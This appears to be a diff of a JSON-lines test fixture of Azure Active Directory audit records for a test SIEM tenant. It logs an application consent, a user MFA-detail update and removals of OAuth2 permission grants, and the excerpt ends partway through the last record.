+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:26:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem"}, {"Type": 2, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Type": 4, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ObjectId": "71a0194b-b70c-44a6-82f2-d4670aee4585", "ModifiedProperties": [{"Name": "ConsentContext.IsAdminConsent", "OldValue": "", "NewValue": "True"}, {"Name": "ConsentContext.IsAppOnly", "OldValue": "", "NewValue": "False"}, {"Name": "ConsentContext.OnBehalfOfAll", "OldValue": "", "NewValue": "True"}, {"Name": "ConsentContext.Tags", "OldValue": "", "NewValue": ""}, {"Name": "ConsentAction.Permissions", "OldValue": "", "NewValue": "[[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]] => [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; "}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ConsentContext.IsAdminConsent\",\"ConsentContext.IsAppOnly\",\"ConsentContext.OnBehalfOfAll\",\"ConsentContext.Tags\",\"ConsentAction.Permissions\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "206711cb-0722-49cc-a9ad-af7f34da9452"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:26:06.0142481Z"}, {"Name": "env_epoch", "Value": "0871Y"}, {"Name": "env_seqNum", "Value": "46795893"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR530"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Consent to application.", "Id": "821dc03c-4e38-4cd1-82b2-3155b41b4418"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:26:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem"}, {"Type": 2, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Type": 4, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ObjectId": "71a0194b-b70c-44a6-82f2-d4670aee4585", "ModifiedProperties": [{"Name": "ConsentContext.IsAdminConsent", "OldValue": "", "NewValue": "True"}, {"NewValue": "False", "OldValue": "", "Name": "ConsentContext.IsAppOnly"}, {"Name": "ConsentContext.OnBehalfOfAll", "OldValue": "", "NewValue": "True"}, {"Name": "ConsentContext.Tags", "OldValue": "", "NewValue": ""}, {"Name": "ConsentAction.Permissions", "OldValue": "", "NewValue": "[[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]] => [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; "}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ConsentContext.IsAdminConsent\",\"ConsentContext.IsAppOnly\",\"ConsentContext.OnBehalfOfAll\",\"ConsentContext.Tags\",\"ConsentAction.Permissions\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "206711cb-0722-49cc-a9ad-af7f34da9452"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:26:06.0142481Z"}, {"Name": "env_epoch", "Value": "0871Y"}, {"Name": "env_seqNum", "Value": "46795893"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR530"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Consent to application.", "Id": "821dc03c-4e38-4cd1-82b2-3155b41b4418"}
 {"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:15:04", "Actor": [{"Type": 5, "ID": "fim_password_service@support.onmicrosoft.com"}, {"Type": 3, "ID": "100300008060F582"}, {"Type": 2, "ID": "User_00000000-0000-0000-0000-000000000000"}, {"Type": 2, "ID": "00000000-0000-0000-0000-000000000000"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "d51ef8df-6617-4356-b8d4-89ad7efef31e", "RecordType": 8, "ActorIpAddress": "", "UserId": "fim_password_service@support.onmicrosoft.com", "UserType": 0, "UserKey": "100300008060F582@support.onmicrosoft.com", "ClientIP": "", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "ObjectId": "asr@testsiem.onmicrosoft.com", "ModifiedProperties": [{"Name": "StrongAuthenticationPhoneAppDetail", "OldValue": "[\r\n  {\r\n    \"DeviceName\": \"NO_DEVICE\",\r\n    \"DeviceToken\": \"NO_DEVICE_TOKEN\",\r\n    \"DeviceTag\": \"SoftwareTokenActivated\",\r\n    \"PhoneAppVersion\": \"NO_PHONE_APP_VERSION\",\r\n    \"OathTokenTimeDrift\": 0,\r\n    \"DeviceId\": null,\r\n    \"Id\": \"3b539b10-3846-4f9b-877d-55b0b8e76147\",\r\n    \"TimeInterval\": null,\r\n    \"AuthenticationType\": 2,\r\n    \"NotificationType\": 1,\r\n    \"SecuredPartitionId\": 0,\r\n    \"SecuredKeyId\": 0\r\n  }\r\n]", "NewValue": "[\r\n  {\r\n    \"DeviceName\": \"NO_DEVICE\",\r\n    \"DeviceToken\": \"NO_DEVICE_TOKEN\",\r\n    \"DeviceTag\": \"SoftwareTokenActivated\",\r\n    \"PhoneAppVersion\": \"NO_PHONE_APP_VERSION\",\r\n    \"OathTokenTimeDrift\": -1,\r\n    \"DeviceId\": null,\r\n    \"Id\": \"3b539b10-3846-4f9b-877d-55b0b8e76147\",\r\n    \"TimeInterval\": null,\r\n    \"AuthenticationType\": 2,\r\n    \"NotificationType\": 1,\r\n    \"SecuredPartitionId\": 0,\r\n    \"SecuredKeyId\": 0\r\n  }\r\n]"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "StrongAuthenticationPhoneAppDetail"}, {"Name": "TargetId.UserType", "OldValue": "", "NewValue": "Member"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "d51ef8df-6617-4356-b8d4-89ad7efef31e"}, {"Name": "actorObjectId", "Value": "00000000-0000-0000-0000-000000000000"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "fim_password_service@support.onmicrosoft.com"}, {"Name": "actorPUID", "Value": "100300008060F582"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "extendedAuditEventCategory", "Value": "User"}, {"Name": "targetUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "targetPUID", "Value": "1003200096971F55"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"StrongAuthenticationPhoneAppDetail\",\"TargetId.UserType\"]"}, {"Name": "correlationId", "Value": "4aa56c6c-8fa5-4787-a165-03f181541438"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"UserType\":\"Member\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "UserManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:15:04.2043419Z"}, {"Name": "env_epoch", "Value": "4QPHR"}, {"Name": "env_seqNum", "Value": "87075075"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##00000000-0000-0000-0000-000000000000_00000000-0000-0000-0000-000000000000_00000000-0000-0000-0000-000000000000"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "becwebservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "becwebservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RBWSR554"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update user.", "Id": "83c924c1-f2e2-4b39-8eda-b80c3823a875"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:16:18", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Microsoft Graph"}, {"Type": 2, "ID": "00000003-0000-0000-c000-000000000000"}, {"Type": 4, "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": ""}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": ""}, {"NewValue": "", "OldValue": "", "Name": "ServicePrincipal.Name"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}, {"Name": "targetName", "Value": "Microsoft Graph"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "2e358876-29c8-45b5-8dba-e233cf769988"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":null,\"ObjectClass\":\"ServicePrincipal\",\"AppId\":null,\"Name\":null}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:16:18.9844570Z"}, {"Name": "env_epoch", "Value": "Z4XUI"}, {"Name": "env_seqNum", "Value": "43649666"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##b2c3071c-9589-469b-9fb1-9311682625c0_00000000-0000-0000-0000-000000000000_b2c3071c-9589-469b-9fb1-9311682625c0"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR581"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove OAuth2PermissionGrant.", "Id": "ec6ba716-ec04-460a-8d9e-661d732c4689"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:16:18", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Microsoft Graph"}, {"Type": 2, "ID": "00000003-0000-0000-c000-000000000000"}, {"Type": 4, "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": ""}, {"NewValue": "", "OldValue": "", "Name": "ServicePrincipal.AppId"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": ""}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}, {"Name": "targetName", "Value": "Microsoft Graph"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "2e358876-29c8-45b5-8dba-e233cf769988"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":null,\"ObjectClass\":\"ServicePrincipal\",\"AppId\":null,\"Name\":null}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:16:18.9844570Z"}, {"Name": "env_epoch", "Value": "Z4XUI"}, {"Name": "env_seqNum", "Value": "43649666"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##b2c3071c-9589-469b-9fb1-9311682625c0_00000000-0000-0000-0000-000000000000_b2c3071c-9589-469b-9fb1-9311682625c0"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR581"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove OAuth2PermissionGrant.", "Id": "ec6ba716-ec04-460a-8d9e-661d732c4689"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:16:18", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Microsoft Graph"}, {"Type": 2, "ID": "00000003-0000-0000-c000-000000000000"}, {"Type": 4, "ID": 